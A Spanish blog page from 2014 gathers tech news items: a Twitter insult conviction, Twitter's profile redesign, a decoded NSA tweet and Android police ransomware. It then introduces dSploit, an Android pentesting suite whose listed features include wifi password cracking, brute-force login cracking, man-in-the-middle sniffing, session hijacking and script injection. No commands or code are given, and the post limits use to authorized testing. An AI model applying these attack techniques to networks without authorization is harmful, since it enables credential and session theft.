La titular del Juzgado de lo Penal número 24 de Madrid ha condenado a pagar 300 euros de multa, 1.000 euros de indemnización y las costas del juicio a un joven, por un delito de injurias, contra la delegada del Gobierno en Madrid, Cristina Cifuentes, en las redes sociales. El joven, de 26 años y conocido en Twitter como Ximicomix, emprendió hace dos años una campaña contra Cifuentes bajo el mensaje "Calla p**a que no tienes dignidad". Ahora, tendrá que cerrar su cuenta tras publicar la condena en su perfil.

En Es la Tarde de Dieter, Cristina Cifuentes ha celebrado la condena, que "ha tardado dos años" y la ha calificado de "paso importante" para frenar a quienes utilizan la red para injuriar y amenazar amparándose en el anonimato. En la entrevista, Cifuentes ha animado a los ciudadanos a denunciar cada vez que se produzcan situaciones de este tipo y ha detallado que la condena llegó tras un acuerdo con el acusado.

Cifuentes ha explicado que el individuo, además de pagar una indemnización, tuvo que reconocer el delito y pedir perdón mirando a los ojos a la delegada del Gobierno como ella misma demandó. Inicialmente, la defensa de Cifuentes pedía cuatro años de cárcel.

La delegada del gobierno, que presentó la denuncia como ciudadana para que no se sospechase que recibía trato de favor, donará la indemnización a la Fundación Padre Garralda.

http://www.libertaddigital.com/ciencia-tecnologia/internet/2014-05-07/un-joven-condenado-a-pedir-perdon-a-la-cara-a-cifuentes-por-insultos-en-twitter-1276517853/

El nuevo perfil de Twitter llegará a todas las cuentas el 28 de mayo

¿Eres de los que piensan que el nuevo perfil de Twitter está demasiado recargado, que es feo o, simplemente, no te convence la nueva estructura en absoluto? Por desgracia, ya no te quedará más opción que usarlo: Twitter acaba de anunciar que el 28 de mayo se activará obligatoriamente este nuevo diseño para todos sus usuarios. Por si hay algún despistado, el aspecto de tu cuenta será similar al que figura sobre estas líneas.

¿Significa eso que la navegación de Twitter vía web seguirá siempre esa misma estructura? No exactamente: el diseño es exclusivo para tu perfil y para el de otros usuarios, a los que accedes a través de twitter.com/genbeta (por ejemplo). Para ver tu timeline, si entras a twitter.com estando logueado en tu cuenta, seguirás utilizando el mismo diseño de siempre: columna estrecha a la izquierda con información de tu perfil, sugerencias y trending topics; columna más ancha a la derecha con la lista de tweets, todos del mismo tamaño.

http://www.genbeta.com/redes-sociales-y-comunidades/el-nuevo-perfil-de-twitter-llegara-a-todas-las-cuentas-el-28-de-mayo

Descifrado el enigmático tuit publicado ayer por la NSA

Esta mañana la cuenta en Twitter de la Agencia de Seguridad Nacional publicó un mensaje que podía hacer pensar que o bien el community manager no se había recuperado del todo de la fiesta de anoche o bien que había sido objeto de un ataque por parte de algunos hackers. Una retahíla incomprensible de letras ocultaba en realidad un mensaje que ya ha sido descifrado.

Aunque al común de los mortales no nos parece más que el fruto del paseo de un gato sobre el teclado de un ordenador, en realidad el tuit de la NSA era una oferta de trabajo.

http://www.theinquirer.es/2014/05/06/descifrado-el-enigmatico-tuit-publicado-por-la-nsa.html

El virus de la policía se centra en los dispositivos Android

Después de ver como el virus era capaz de afectar a los equipos de sobremesa y ordenadores portátiles de los usuarios, obligando a estos a pagar una cierta cantidad de dinero para poder desbloquear el equipo, los dueños del virus de la policía han cambiado su objetivo y han comenzado a fijarse en los dispositivos Android.

Según indican expertos en seguridad, el número de dispositivos Android infectados ha alcanzado ya la cifra de 100.000, y es evidente que se espera que este número siga aumentando, ayudado en parte porque muchos son los usuarios que recurren a tiendas de aplicaciones no oficiales para hacerse con aplicaciones que en principio serían de pago.

http://www.redeszone.net/2014/05/07/el-virus-de-la-policia-se-centra-en-los-dispositivos-android/

sábado, 3 de mayo de 2014

Dsploit: Pentesting con tu teléfono movil

Dsploit es una suite orientada al pentesting en Android al que necesitaremos permisos root en el dispositivo y que detallamos sus puntos fuertes a continuación:

Pentesting wifi passwords: Dsploit tiene un diccionario cargado que verifica el acceso a esa wifi en caso de que sea vulnerable solo con un click.


Una vez dentro de nos saldrán los dispositivos conectados (algunas veces no veremos aquellos conectados por wifi). Puedes complementar con otras herramientas como fing y añadir ips que descubras en la red.

Una vez elegido el sistema tenemos un abanico de posibilidades:
RouterPWN: Carga http://routerpwn.com para pwn tu router.
Trace: Similar al comando tracert (ip victim) en windows.
Port Scanner: Escanea los puertos que tiene abiertos el equipo. Sustituye a nmap en esta función.
Inspector: Permite obtener información acerca del equipo (ip, tipo de dispositivo, Sistema operative y servicios).
Vulnerability Finder: Busca vulnerabilidades conocidas que tenga la victima que busca sobre una BD.
Login Cracker: Herramienta de fuerza bruta que permite sacar passwords sobre diferentes servicios.


MITM: Realiza ataques Man in the middle.
Simple sniff: Escucha todos los paquetes enviados entre la victima y el router y lo guarda en un archivo .pcap
Password sniffer: Oye las contraseñas de muchos protocolos(http, ftp,imap,irc,msn…)
Sesion Hijacker: Escucha las cookies de un nodo y roba sesiones.
Kill conections: Mata cualquier conexión perdiendo la conexión a cualquier web o servidor.
Redirect: Redirecciona todo el trafico http a otra dirección que elijas.
Replace Images: Reemplaza todas las imagines de la pagina web por la que elijas.
Replace Videos: Reemplaza todos los videos de youtube por uno especifico.
Script Injection: Permite inyectar código javascript al cargar una pagina. Esto puede estar en un archivo .js o escribes el código. Como por ejemplo alert(‘¿Molesto?’).
Custom filter: Reemplaza el texto que desees, útil para cambiar por ejemplo: jose por pepe de todas las paginas web.

[+] Todos estos ataques son bastante lentos de cargar al tener que pasar todo tu trafico por tu dispositivo.


Packet forger: Elabora y envia paquetes personalizados por TCP o UDP a la victima.

[+] Esta herramienta es para usarlas en laboratorios de seguridad, testear la seguridad en tu red o la de hacer pentesting con autorizacion del propietario de la red, todo el resto está considerado como delito y podría meterse en problemas legales.




MZN LABSEC